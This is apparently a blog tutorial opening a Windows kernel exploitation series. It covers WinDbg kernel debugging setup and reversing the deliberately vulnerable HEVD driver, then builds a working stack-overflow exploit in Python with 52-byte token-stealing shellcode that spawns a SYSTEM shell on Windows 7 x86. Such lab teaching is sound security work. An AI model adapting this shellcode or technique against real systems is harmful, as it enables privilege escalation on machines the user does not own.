This post will be the first of many in which I guide you into the world of Windows Kernel Exploitation. As with anything in life, you must start somewhere, and although this post focuses on Windows 7 (x86) and Windows 10 (x64), we will ultimately work our way up to Windows 11 (x64).

To get started, for this post you will need:

  • Virtualization Software: This can be anything from VirtualBox to VMware. I will leave the choice of virtualization software up to you.
  • WinDbg: This will serve as our kernel debugger. It is important that you download it from the Windows Driver Kit and do NOT use WinDbg Preview for this series.
  • HEVD: For this tutorial series I will be using HEVD v3.00, the latest version at the time of writing. HEVD stands for HackSys Extreme Vulnerable Driver, and it will serve as our target for this series.
  • OSRLOADER: Since HEVD is a driver, we need a way to load it into the operating system; for this I will be using the OSRLOADER application.
  • Python: At the time of writing I was using version 3.11.5; however, any recent version should be fine.
  • Ghidra: Ghidra will serve as our reverse engineering platform. If you have a copy of IDA Pro, you are more than welcome to adapt this series to use it :)
  • Sickle: This will be the payload development framework we use for opcode generation as well as for our token stealing shellcode. If you're reading this in 2024, the new release is most likely not out yet, so you will have to use the latest branch, NOT the latest release (in other words, just clone the repo).

It is important to note that I have structured these guides to take you from Exploit Developer to Kernel Exploit Developer. If you have never written a ROP chain or are completely unfamiliar with modern memory protections, I strongly recommend starting with userland exploitation.

If you’re tight on cash and are looking for free resources I highly recommend the following:

  • Corelan Tutorials: Corelan was one of my biggest inspirations in making these blog posts. When I first started my journey into Exploit Development I read Corelan tutorials 1-11. I believe the content that is presented in them is still relevant to this day. Do not let the lack of modern operating systems used in this free series deter you. Concepts such as Egg Hunters work on Windows 11 just as well as they did for Windows XP.
  • Modern Binary Exploitation: This is a free course written by the founders of RET2. With permission of the course authors, I have released my notes on my GitHub, which you can use to follow along with the slides. Once again, although this material targets Linux x86, it is easily transferable to Windows.

If you currently work for an employer, or are fortunate enough to choose your own training, I highly recommend the following:

  • Corelan Training: Corelan offers updated training for the modern Windows environment, so if you would prefer up-to-date content, its Expert Level Stack course should provide a solid foundation for Windows Exploit Development. I took the Heap Masterclass in 2019 and plan to attend again in the future.
  • RET2 Wargames: RET2 Wargames is a course I took and completed in 2024, and I cannot emphasize enough how much it has impacted me. In addition, after completing it I contacted the course authors, and they let me release my MBE notes for free. If this is not enough to make you want to support them, I don't know what is. I have also written an in-depth review if you would like to learn more: here.

As of writing this post, I AM NOT sponsored by RET2 or Corelan. I truly believe in the course authors, and if you do a little research, you will want to support them, if not now, then in the future.

With that, we’re ready to get started!

Kernel Debugging with WinDbg

When reading this tutorial, it's important to recognize two definitions. First, the computer we will be working from is called the host computer or debugger machine, whereas the computer being debugged is called the target computer or debuggee machine. We will be running our debuggee as a virtual machine.

Configuring Target Computer (Debugee)

To begin, power on the debuggee virtual machine, open an administrative command prompt, and enter the following commands.

C:\Windows\system32>bcdedit /copy {current} /d "Kernel Debugging On"
The entry was successfully copied to {3709675a-4632-11ee-b00a-b3e46a698b2a}.

C:\Windows\system32>bcdedit /debug {3709675a-4632-11ee-b00a-b3e46a698b2a} on
The operation completed successfully.

The commands above will generate an entry in the boot table with debugging enabled. We can confirm this by running bcdedit on its own.

After creating the boot entry (now with debugging enabled), launch the System Configuration app (msconfig). Once it opens, navigate to the Boot tab, select your newly added entry, and hit Advanced Options... Then copy the settings shown below (I used COM2). It's important that the baud rate matches the host computer, which we will configure to use 115200.

Hit OK, Apply, OK, then restart the Virtual Machine (VM).

Virtual Machine Settings

Power off the VM, then open the VM settings and add a serial port. Once it is added, use the settings shown below:

The next time you boot, select the newly added entry as shown below. For now, we can move on to the next step.

Configuring Host Computer (Debugger)

Assuming the target computer has been configured, open the appropriate WinDbg, in my case WinDbg (X64). Once it opens, select File, then Kernel Debug...

A window will pop up; navigate to the COM tab and enter the following (adjusted to your configuration).

Then hit OK. If you have not already done so, boot the target computer. Once it has loaded the debugging entry we added earlier, you should see the following.

You now have kernel debugging set up! Now, as an exercise, do this again on Windows 7.

Introduction to HEVD

By now you should know how to set up kernel debugging. With that done, make sure you have downloaded HEVD, OSRLOADER, and Python onto the target computer (the debuggee machine).

To load HEVD for the first time, launch OSRLOADER.exe, making sure to run it as an administrator. You should see the following:

Once it has launched, hit the Browse button, navigate to the appropriate HEVD driver, and open it.

To ensure the driver is loaded on boot, select Automatic from the Service Start drop-down. Then hit Register Service, followed by Start Service. You should see the following message:

Returning to our attached debugger, if you break in and list the loaded modules (for example, with lm), you should see HEVD.

The next thing we’ll need to do is fix the symbols.

Take note of the path C:\projects\hevd\build\driver\vulnerable\x86\HEVD\HEVD.pdb: we need to create the same directory on the host computer and copy all the files over, like so:

Once done, reboot the machine. If everything went well this time you should see the following:

Working with Device Drivers

Device drivers are kernel-mode objects, so we cannot directly modify them from user mode. To interact with a driver, we first need to obtain a HANDLE to it. To do this, we pass a symbolic link that the driver exposes (we will find HEVD's shortly) to CreateFileA.

Once we have a handle, we can use the DeviceIoControl function to send device input and output control (IOCTL) requests to the driver. Each request carries a control code, and each control code represents an operation for the driver to perform. For example, a control code can ask the device to carry out an action such as formatting a disk.

Let’s look at where we can find the information needed to perform these calls within HEVD.

Working with HEVD, Ghidra and WinDbg

If we load HEVD.sys into Ghidra, we can see that the driver's entry point really begins at DriverEntry(). This is the first routine called when the driver is loaded, and it is responsible for initializing the driver.

If we enter this function, the picture becomes clearer.

Let's take a look at this in WinDbg. To do so, reboot the machine and set a breakpoint on the driver's entry point before the driver is loaded (for example, with a deferred breakpoint such as bu HEVD!DriverEntry). You should then hit the breakpoint.

If you continue to unassemble from here (the u command), you should eventually see the call to IoCreateSymbolicLink. This function creates the symbolic link that we can open from user mode.

If we print the first argument, we can see the name of the symbolic link is going to be HackSysExtremeVulnerableDriver.

We can ignore the \\DosDevices prefix, as this is a special namespace that Windows uses for MS-DOS device names. To interact with the driver from userland we'll use \\.\HackSysExtremeVulnerableDriver: the \\.\ prefix selects the “Win32 device namespace”, also called the “raw device namespace”. Although we did not need to step through this, I wanted to see which arguments are passed into the function when creating the symbolic link.
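
The quadruple backslashes in the PoC's CreateFileA call are only Python escaping. This small check compares the escaped bytes literal used in the PoC with a raw literal, to show that both spell the same Win32 device path:

```python
# Escaped form, as written in the PoC.
escaped = b"\\\\.\\HackSysExtremeVulnerableDriver"
# Raw form: backslashes are taken literally.
raw = rb"\\.\HackSysExtremeVulnerableDriver"

assert escaped == raw
print(raw.decode())  # \\.\HackSysExtremeVulnerableDriver
```

A raw literal is often easier to read, with one caveat: it cannot end in a single backslash.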

So how do we send data to HEVD? As previously mentioned, we're going to use DeviceIoControl. As a recap, below are the parameters used by the function.

The main thing we want to focus on is the dwIoControlCode parameter. This is the “command” we want the driver to execute. These “commands”, or requests, are delivered to the driver in I/O request packets (IRPs).

Looking back at the Ghidra decompilation, on line 31 we see that param_1->MajorFunction[0xe] is set to IrpDeviceIoCtlHandler. Why? If we look at MSDN, we see the following definition for this structure (_DRIVER_OBJECT).

Setting this entry makes IrpDeviceIoCtlHandler the “function” that controls how the device can be interacted with. We know this from the IRP major function code 0xE (IRP_MJ_DEVICE_CONTROL) shown below: it is the index Windows checks when dispatching a DeviceIoControl request, so for now I'm treating this handler as the driver's “main” function.
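
To connect the decompiled param_1->MajorFunction[0xe] with what you may see in raw disassembly, here is a small offset calculation. It assumes MajorFunction starts at offset 0x38 of _DRIVER_OBJECT on x86 and at 0x70 on x64, as I understand the public symbols; confirm this on your own target with dt nt!_DRIVER_OBJECT before relying on it.

```python
IRP_MJ_DEVICE_CONTROL = 0x0E

# Assumed offset of _DRIVER_OBJECT.MajorFunction[0], and pointer size, per arch.
MAJOR_FUNCTION_BASE = {"x86": 0x38, "x64": 0x70}
POINTER_SIZE = {"x86": 4, "x64": 8}

def major_function_slot(arch: str, irp_mj: int) -> int:
    """Byte offset of MajorFunction[irp_mj] from the start of _DRIVER_OBJECT."""
    return MAJOR_FUNCTION_BASE[arch] + irp_mj * POINTER_SIZE[arch]

for arch in ("x86", "x64"):
    print(arch, hex(major_function_slot(arch, IRP_MJ_DEVICE_CONTROL)))
# x86 0x70
# x64 0xe0
```

Under these assumptions, the assignment in DriverEntry would show up on x86 as a store to [driver_object+0x70].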

If we double-click IrpDeviceIoCtlHandler in Ghidra, we're presented with its decompilation. Here we can see that HEVD uses a switch statement to handle our I/O requests.

With that we have everything needed to get started with Exploit Development.

Stack Overflow (Windows 7 - x86)

To ease into things, why not start with a traditional buffer overflow? To ease you in further, I will also be using Python; keep in mind, however, that later in this series we will be using C and potentially C++.

Identifying the Vulnerability

Since we have symbols, “reverse engineering” will be straightforward. Within IrpDeviceIoCtlHandler we can see that the stack buffer overflow can be triggered using the I/O control code 0x222003.
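
Control codes such as 0x222003 are not arbitrary: they are normally built with the CTL_CODE macro from the Windows driver headers, which packs a device type, an access mask, a function number, and a transfer method into 32 bits. The sketch below is my own Python port of that bit layout (the helper names are hypothetical), used to decode the code above:

```python
# CTL_CODE layout: bits 31-16 DeviceType, 15-14 Access, 13-2 Function, 1-0 Method
FILE_DEVICE_UNKNOWN = 0x22
FILE_ANY_ACCESS = 0
METHOD_NEITHER = 3

def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python port of the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method

def decode_ioctl(code: int) -> dict:
    """Split a control code back into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }

print({name: hex(value) for name, value in decode_ioctl(0x222003).items()})
# {'device_type': '0x22', 'access': '0x0', 'function': '0x800', 'method': '0x3'}
print(hex(ctl_code(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS)))
# 0x222003
```

The method field is 3 (METHOD_NEITHER), meaning the I/O manager hands the driver our user-mode buffer pointer without copying it. That is consistent with the input showing up as Type3InputBuffer in the next section.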

Next, let's enter the function BufferOverflowStackIoctlHandler.

We ultimately make a call to TriggerBufferOverflowStack.

Let's write a proof of concept (PoC) to see what happens when we enter this function. For this tutorial we will be using Python.

import struct
import os
from ctypes import *

GENERIC_READ          = 0x80000000
GENERIC_WRITE         = 0x40000000
OPEN_EXISTING         = 0x00000003
FILE_ATTRIBUTE_NORMAL = 0x00000080

NULL = None

def main():

  kernel32 = windll.kernel32
  hHEVD = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL)
  if (hHEVD == -1):
    print("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n")
    exit(-1)

  buffer = b"wetw0rk"  # bytes: a Python str would be passed as a UTF-16 (wchar_t) pointer

  print("[*] Calling control code 0x222003")
  kernel32.DeviceIoControl(hHEVD,
                           0x222003,
                           buffer,
                           len(buffer),
                           NULL,
                           0x00,
                           byref(c_ulong()),
                           NULL)

main()

Understanding BufferOverflowStackIoctlHandler

Let’s set a breakpoint on BufferOverflowStackIoctlHandler.

Let's see exactly what is passed into this function. We can start by dumping the stack frame.

Looking at BufferOverflowStackIoctlHandler in Ghidra tells us these parameters are of type _IRP and _IO_STACK_LOCATION (we also saw this earlier in the current stack frame in WinDbg).

However, we're really only using param_2, of type _IO_STACK_LOCATION. We can find this structure's layout in the Microsoft documentation; since it's rather large, I'll only show the relevant portion below.

typedef struct _IO_STACK_LOCATION {
  UCHAR                  MajorFunction;
  UCHAR                  MinorFunction;
  UCHAR                  Flags;
  UCHAR                  Control;
  union {
...
    struct {
      ULONG                   OutputBufferLength;
      ULONG POINTER_ALIGNMENT InputBufferLength;
      ULONG POINTER_ALIGNMENT FsControlCode;
      PVOID                   Type3InputBuffer;
    } FileSystemControl;
...
  } Parameters;
  PDEVICE_OBJECT         DeviceObject;
  PFILE_OBJECT           FileObject;
  PIO_COMPLETION_ROUTINE CompletionRoutine;
  PVOID                  Context;
} IO_STACK_LOCATION, *PIO_STACK_LOCATION;

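If we dump this in WinDbg, we can see that (param_2->Parameters).FileSystemControl.Type3InputBuffer is the pointer to our buffer. Ghidra labels it FileSystemControl, but that member has the same layout as the DeviceIoControl member of the union, which is the one a device control request actually uses.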
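
To see why Type3InputBuffer is where our pointer lives, here is a simplified ctypes model of the start of _IO_STACK_LOCATION on a 32-bit kernel. It is a sketch under stated assumptions: it models only the four leading UCHAR fields and the DeviceIoControl member of the Parameters union (which shares its layout with the FileSystemControl member Ghidra shows), and it uses c_uint32 for pointers so the offsets match x86 even when run on a 64-bit host.

```python
import ctypes

class IoStackLocationX86(ctypes.Structure):
    """Partial 32-bit layout of _IO_STACK_LOCATION (Parameters.DeviceIoControl only)."""
    _fields_ = [
        ("MajorFunction", ctypes.c_uint8),
        ("MinorFunction", ctypes.c_uint8),
        ("Flags", ctypes.c_uint8),
        ("Control", ctypes.c_uint8),
        # Parameters.DeviceIoControl
        ("OutputBufferLength", ctypes.c_uint32),
        ("InputBufferLength", ctypes.c_uint32),
        ("IoControlCode", ctypes.c_uint32),
        ("Type3InputBuffer", ctypes.c_uint32),  # PVOID on x86
    ]

# Print offsets in the same style as WinDbg's dt command.
for name, _ in IoStackLocationX86._fields_:
    print(f"+0x{getattr(IoStackLocationX86, name).offset:03x} {name}")
```

If the model holds, Type3InputBuffer sits at +0x010 and the length we pass to DeviceIoControl lands in InputBufferLength at +0x008, which you can compare against your own WinDbg dump.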

So when we enter TriggerBufferOverflowStack, we can rest assured that our input is being passed as param_1.

Understanding TriggerBufferOverflowStack

Now that we know param_1 of TriggerBufferOverflowStack is in fact our buffer, exploitation seems rather easy.

All we need to do is send over 2060 bytes and we should have memory corruption! Let’s update the PoC and send it!

import struct
import os
from ctypes import *

GENERIC_READ          = 0x80000000
GENERIC_WRITE         = 0x40000000
OPEN_EXISTING         = 0x00000003
FILE_ATTRIBUTE_NORMAL = 0x00000080

NULL = None

def main():

  kernel32 = windll.kernel32
  hHEVD = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL)
  if (hHEVD == -1):
    print("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n")
    exit(-1)

  buffer = b"A" * 3000

  print("[*] Calling control code 0x222003")
  kernel32.DeviceIoControl(hHEVD,
                           0x222003,
                           buffer,
                           len(buffer),
                           NULL,
                           0x00,
                           byref(c_ulong()),
                           NULL)

main()

Once sent, we can see we have successfully overwritten the return address and we have gained control over the instruction pointer.
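
The instruction pointer reads as 0x41414141 because the four “A” (0x41) bytes that land on the saved return address are interpreted as a little-endian 32-bit value. The same ordering is why the final PoC packs its shellcode address with struct.pack("<L", ...). Here is a minimal sketch of that layout; the target address is a made-up placeholder, and 2080 is the padding length the final PoC uses:

```python
import struct

def build_overflow(padding_len: int, ret_addr: int) -> bytes:
    """Filler bytes followed by a 32-bit little-endian return address."""
    return b"A" * padding_len + struct.pack("<L", ret_addr)

print(hex(struct.unpack("<L", b"AAAA")[0]))  # 0x41414141
payload = build_overflow(2080, 0xDEADBEEF)   # hypothetical target address
print(len(payload))                          # 2084
print(payload[-4:].hex())                    # efbeadde
```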

Kernel Shellcode??

So, we got control over the instruction pointer, and we have a solid understanding of how. The question remains, how do we get code execution, or rather spawn a SYSTEM shell?

We're gonna need shellcode, but we can't just use any shellcode. Since we're running in the context of the kernel, one wrong move means a blue screen of death (BSOD). To reach our goal, we're going to use a technique known as token stealing: we'll copy a token with SYSTEM privileges into our current process.

Luckily for us, HEVD comes with a few payloads, including this one. Let's take a look at it in Payloads.c.

186 VOID TokenStealingPayloadWin7Generic() {
187     // No Need of Kernel Recovery as we are not corrupting anything
188     __asm {
189         pushad                               ; Save registers state
190         
191         ; Start of Token Stealing Stub       
192         xor eax, eax                         ; Set ZERO
193         mov eax, fs:[eax + KTHREAD_OFFSET]   ; Get nt!_KPCR.PcrbData.CurrentThread
194                                              ; _KTHREAD is located at FS:[0x124]
195         
196         mov eax, [eax + EPROCESS_OFFSET]     ; Get nt!_KTHREAD.ApcState.Process
197         
198         mov ecx, eax                         ; Copy current process _EPROCESS structure
199         
200         mov edx, SYSTEM_PID                  ; WIN 7 SP1 SYSTEM process PID = 0x4
201         
202         SearchSystemPID:
203             mov eax, [eax + FLINK_OFFSET]    ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
204             sub eax, FLINK_OFFSET
205             cmp [eax + PID_OFFSET], edx      ; Get nt!_EPROCESS.UniqueProcessId
206             jne SearchSystemPID
207         
208         mov edx, [eax + TOKEN_OFFSET]        ; Get SYSTEM process nt!_EPROCESS.Token
209         mov [ecx + TOKEN_OFFSET], edx        ; Replace target process nt!_EPROCESS.Token
210                                              ; with SYSTEM process nt!_EPROCESS.Token
211         ; End of Token Stealing Stub
212         
213         popad                                ; Restore registers state
214     }
215 }

Let's break this down line by line. On line 192 we clear the EAX register. Next, on line 193 we use the FS register to get the address of the current thread, located at offset 0x124 (in x86 kernel mode, FS points to the _KPCR). We can see this in WinDbg.

Let's map out the structure. First we need the base address of the Processor Control Region (PCR), also known as the _KPCR; from there we can easily traverse the structure and find the current thread.

Next, we need to find the address of the _EPROCESS (“Executive Process”) data structure. Each running process on a Windows system is associated with an _EPROCESS structure. We can find it just as we did the _KPCR.

Now let’s look at the next block of code within this Payload (Feel free to just follow along. At this point I began writing the shellcode stub):

         SearchSystemPID:
             mov eax, [eax + FLINK_OFFSET]    ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
             sub eax, FLINK_OFFSET
             cmp [eax + PID_OFFSET], edx      ; Get nt!_EPROCESS.UniqueProcessId
             jne SearchSystemPID

Here we extract the forward link (FLINK) pointer from the current _EPROCESS structure. Because FLINK points to the ActiveProcessLinks field of the next _EPROCESS rather than to its start, we subtract the FLINK offset so that EAX points to the start of the next _EPROCESS structure in the linked list. We then compare that structure's process ID to 0x04; if it doesn't match, we keep walking the list until we find the SYSTEM process.

Once we find it, we simply overwrite the current process's token with the SYSTEM token. This is almost like an egghunter, but for tokens.

         mov edx, [eax + TOKEN_OFFSET]        ; Get SYSTEM process nt!_EPROCESS.Token
         mov [ecx + TOKEN_OFFSET], edx        ; Replace target process nt!_EPROCESS.Token
                                              ; with SYSTEM process nt!_EPROCESS.Token
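
To make the pointer arithmetic concrete, here is a user-mode simulation of the stub's loop over a fake memory map (a Python dict from address to value). It is only a model: the addresses, PIDs, and token values are made up, it uses the Windows 7 SP1 x86 offsets from the stub, and, like the stub, it copies the raw token value and would loop forever if no PID 4 exists.

```python
FLINK_OFFSET = 0xB8   # _EPROCESS.ActiveProcessLinks.Flink
PID_OFFSET = 0xB4     # _EPROCESS.UniqueProcessId
TOKEN_OFFSET = 0xF8   # _EPROCESS.Token
SYSTEM_PID = 4

def make_process(mem, base, pid, token, next_base):
    """Write the three fields the stub touches for one fake _EPROCESS."""
    mem[base + PID_OFFSET] = pid
    mem[base + TOKEN_OFFSET] = token
    # Flink points at the next process's ActiveProcessLinks, not at its base.
    mem[base + FLINK_OFFSET] = next_base + FLINK_OFFSET

def steal_token(mem, current):
    eax = current
    while True:
        eax = mem[eax + FLINK_OFFSET]            # mov eax, [eax + 0xb8]
        eax -= FLINK_OFFSET                      # sub eax, 0xb8
        if mem[eax + PID_OFFSET] == SYSTEM_PID:  # cmp [eax + 0xb4], edx
            break                                # jne falls through
    mem[current + TOKEN_OFFSET] = mem[eax + TOKEN_OFFSET]  # copy the token

# Hypothetical circular list: 0x1000 (PID 4) -> 0x2000 (ours) -> 0x3000 -> 0x1000
mem = {}
make_process(mem, 0x1000, 4, 0xAAAA0000, 0x2000)
make_process(mem, 0x2000, 1337, 0xBBBB0000, 0x3000)
make_process(mem, 0x3000, 4242, 0xCCCC0000, 0x1000)

steal_token(mem, current=0x2000)
print(hex(mem[0x2000 + TOKEN_OFFSET]))  # 0xaaaa0000
```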

The full code can be seen below:

[BITS 32      ]
[SECTION .text]

global _start

_start:

	pushad
	xor eax, eax                      ; set ZERO
	mov eax, dword fs:[eax+0x124]     ; nt!_KPCR.PrcbData.CurrentThread
	mov eax, [eax + 0x50]             ; nt!_KTHREAD.ApcState.Process
	mov ecx, eax                      ; Copy current process _EPROCESS structure
	mov edx, 0x04                     ; WIN 7 SP1 SYSTEM process PID

	SearchSystemPID:
		mov eax, [eax + 0xb8]         ; nt!_EPROCESS.ActiveProcessLinks.Flink
		sub eax, 0xb8
		cmp [eax + 0xb4], edx         ; nt!_EPROCESS.UniqueProcessId
		jne SearchSystemPID

	mov edx, [eax + 0xf8]             ; Get SYSTEM process nt!_EPROCESS.Token
	mov [ecx + 0xf8], edx             ; Replace target process nt!_EPROCESS.Token
	popad

Let's look at this in the debugger. First, generate the shellcode using Sickle:

$ python3 sickle.py -p windows/x86/kernel_token_stealer -f python3 -v shellcode
# Bytecode generated by Sickle, size: 52 bytes
shellcode = bytearray()
shellcode += b'\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89'
shellcode += b'\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8'
shellcode += b'\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8'
shellcode += b'\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61'
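
As a sanity check on the bytes, the sketch below locates the loop's jne (opcode 0x75, followed by a signed 8-bit displacement measured from the end of the instruction) and confirms it jumps back to mov eax, [eax + 0xb8], the first instruction of SearchSystemPID. It also shows that the stub ends in 0x61 (popad) with no return instruction.

```python
import struct

# The 52 bytes from the Sickle output above.
shellcode = bytes.fromhex(
    "6031c0648b80240100008b405089"
    "c1ba040000008b80b80000002db8"
    "0000003990b400000075ed8b90f8"
    "0000008991f800000061"
)

jne = shellcode.find(b"\x75\xed")                          # jne SearchSystemPID
disp = struct.unpack_from("b", shellcode, jne + 1)[0]      # signed rel8
target = jne + 2 + disp                                    # relative to next instruction
loop_start = shellcode.find(b"\x8b\x80\xb8\x00\x00\x00")  # mov eax, [eax + 0xb8]

print(len(shellcode), jne, disp, target, loop_start)  # 52 37 -19 20 20
print(hex(shellcode[-1]))                             # 0x61 (popad)
```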

Now let’s update the PoC as shown below:

import struct
import os
from ctypes import *

GENERIC_READ           = 0x80000000
GENERIC_WRITE          = 0x40000000
OPEN_EXISTING          = 0x00000003
FILE_ATTRIBUTE_NORMAL  = 0x00000080
MEM_COMMIT             = 0x00001000
MEM_RESERVE            = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040

NULL = None

def main():

  kernel32 = windll.kernel32
  hHEVD = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL)
  if (hHEVD == -1):
    print("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n")
    exit(-1)

  # python3 sickle.py -p windows/x86/kernel_token_stealer -f python3 -v shellcode
  # Bytecode generated by Sickle, size: 52 bytes
  shellcode = bytearray()
  shellcode += b'\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1'
  shellcode += b'\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00'
  shellcode += b'\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00'
  shellcode += b'\x89\x91\xf8\x00\x00\x00\x61'

  print("[*] Allocating RWX memory")
  ptrMemory = kernel32.VirtualAlloc(NULL,
                                    len(shellcode),
                                    (MEM_COMMIT | MEM_RESERVE),
                                    PAGE_EXECUTE_READWRITE)

  print("[*] Creating a char array to house shellcode")
  buffer = (c_char * len(shellcode)).from_buffer(shellcode)

  print("[*] Copying shellcode array into RWX memory")
  kernel32.RtlMoveMemory(c_int(ptrMemory), buffer, len(shellcode))

  ptrShellcode = struct.pack("<L", ptrMemory)

  buffer  = b"A" * 2080
  buffer += ptrShellcode

  print("[*] Calling control code 0x222003")
  kernel32.DeviceIoControl(hHEVD,
                           0x222003,
                           buffer,
                           len(buffer),
                           NULL,
                           0x00,
                           byref(c_ulong()),
                           NULL)

  os.system("cmd.exe")

main()

Since we're overwriting the return address, let's set a breakpoint at BASE+OFFSET, where OFFSET is the location of the function's return. We can get the offset from Ghidra.
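
If it helps, the BASE+OFFSET arithmetic can be written out as below. All addresses here are hypothetical placeholders: take the instruction address and image base from your own Ghidra project, and the module base from WinDbg (for example via lm m HEVD).

```python
def ghidra_to_runtime(ghidra_addr: int, ghidra_image_base: int, module_base: int) -> int:
    """Translate an address in Ghidra's listing to the driver as loaded in the kernel."""
    return module_base + (ghidra_addr - ghidra_image_base)

# Hypothetical: instruction at 0x1453a in Ghidra, image base 0x10000,
# HEVD loaded at 0x9a8f0000 on the target.
print(hex(0x1453A - 0x10000))                                # 0x453a
print(hex(ghidra_to_runtime(0x1453A, 0x10000, 0x9A8F0000)))  # 0x9a8f453a
```

WinDbg can also evaluate module-relative expressions directly, so bp HEVD+0x453a (with your real offset) sets the same breakpoint without doing the addition by hand.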

Now let’s apply this to WinDbg.

With the breakpoint set, let's launch our exploit on the target machine. Once the breakpoint is hit, we can see that we're about to return into the allocated memory region and execute our 52-byte shellcode.

Let's step into this (t) until we hit mov edx, 0x04. At this point, both ECX and EAX should contain a pointer to the current process's _EPROCESS.

The next instruction moves the FLINK pointer into EAX.

Next, sub eax, 0xb8 executes. Since FLINK points at the ActiveProcessLinks field rather than at the start of the structure, this positions EAX at the start of the next _EPROCESS structure.

Let's set a breakpoint here and continue execution until _EPROCESS.UniqueProcessId is 0x04 (I set it on a raw address, so it likely won't resolve after a reboot). Once found, we can see that the jump won't be taken!

Now the code simply copies the token into our current _EPROCESS structure! It appears I was wrong in my last couple of notes: the token can be found in the owning process.

So the reality is that we don't need to look very far once we have the current thread. I was confused, but it makes total sense now. Below is a screenshot to recap!

Now we can continue executing our shellcode, but we crash. Why?

Fixing The Crash

Looking at the state of the registers, it appears EBP is still corrupted. More importantly, however, we never return. Let's add a ret instruction to the shellcode, place a valid address into EBP, and try again.

┌──(wetw0rk㉿kali)-[/opt/Sickle/src]
└─$ python3 sickle.py -a x86 -m asm_shell -f c                                            
[*] ASM Shell loaded for x86 architecture

sickle > a pop ebp
"\x5d" // pop ebp
sickle > a ret
"\xc3" // ret

Once we update the PoC and send it, we still crash. So I decided to look at Ghidra, where you can see that the function returns with RET 0x8, which also pops 8 bytes of arguments off the stack. Let's try that!
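
For reference, here is one way to append the tail described above to the Sickle stub. It assumes the fixed stub keeps pop ebp and swaps the plain ret for ret 0x8, in that order, after popad. The encodings are pop ebp = 0x5d (as shown by the Sickle ASM shell) and ret imm16 = 0xc2 followed by a 16-bit little-endian immediate.

```python
# The 52-byte token stealing stub from the Sickle output above.
stub = bytes.fromhex(
    "6031c0648b80240100008b405089"
    "c1ba040000008b80b80000002db8"
    "0000003990b400000075ed8b90f8"
    "0000008991f800000061"
)

POP_EBP = b"\x5d"
RET_8 = b"\xc2" + (8).to_bytes(2, "little")  # ret 0x8

shellcode = stub + POP_EBP + RET_8
print(len(shellcode), shellcode[-4:].hex())  # 56 5dc20800
```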

Once sent, we have SYSTEM!

Sources

https://www.welivesecurity.com/2017/03/27/configure-windbg-kernel-debugging/
https://microsoft.public.windbg.narkive.com/MamhR9YH/win7-and-kpcr
https://github.com/LordNoteworthy/windows-internals/blob/master/IRP%20Major%20Functions%20List.md
https://youtu.be/Ca3dAXDdoz8?si=oN_DsgyLz-Z4fVYL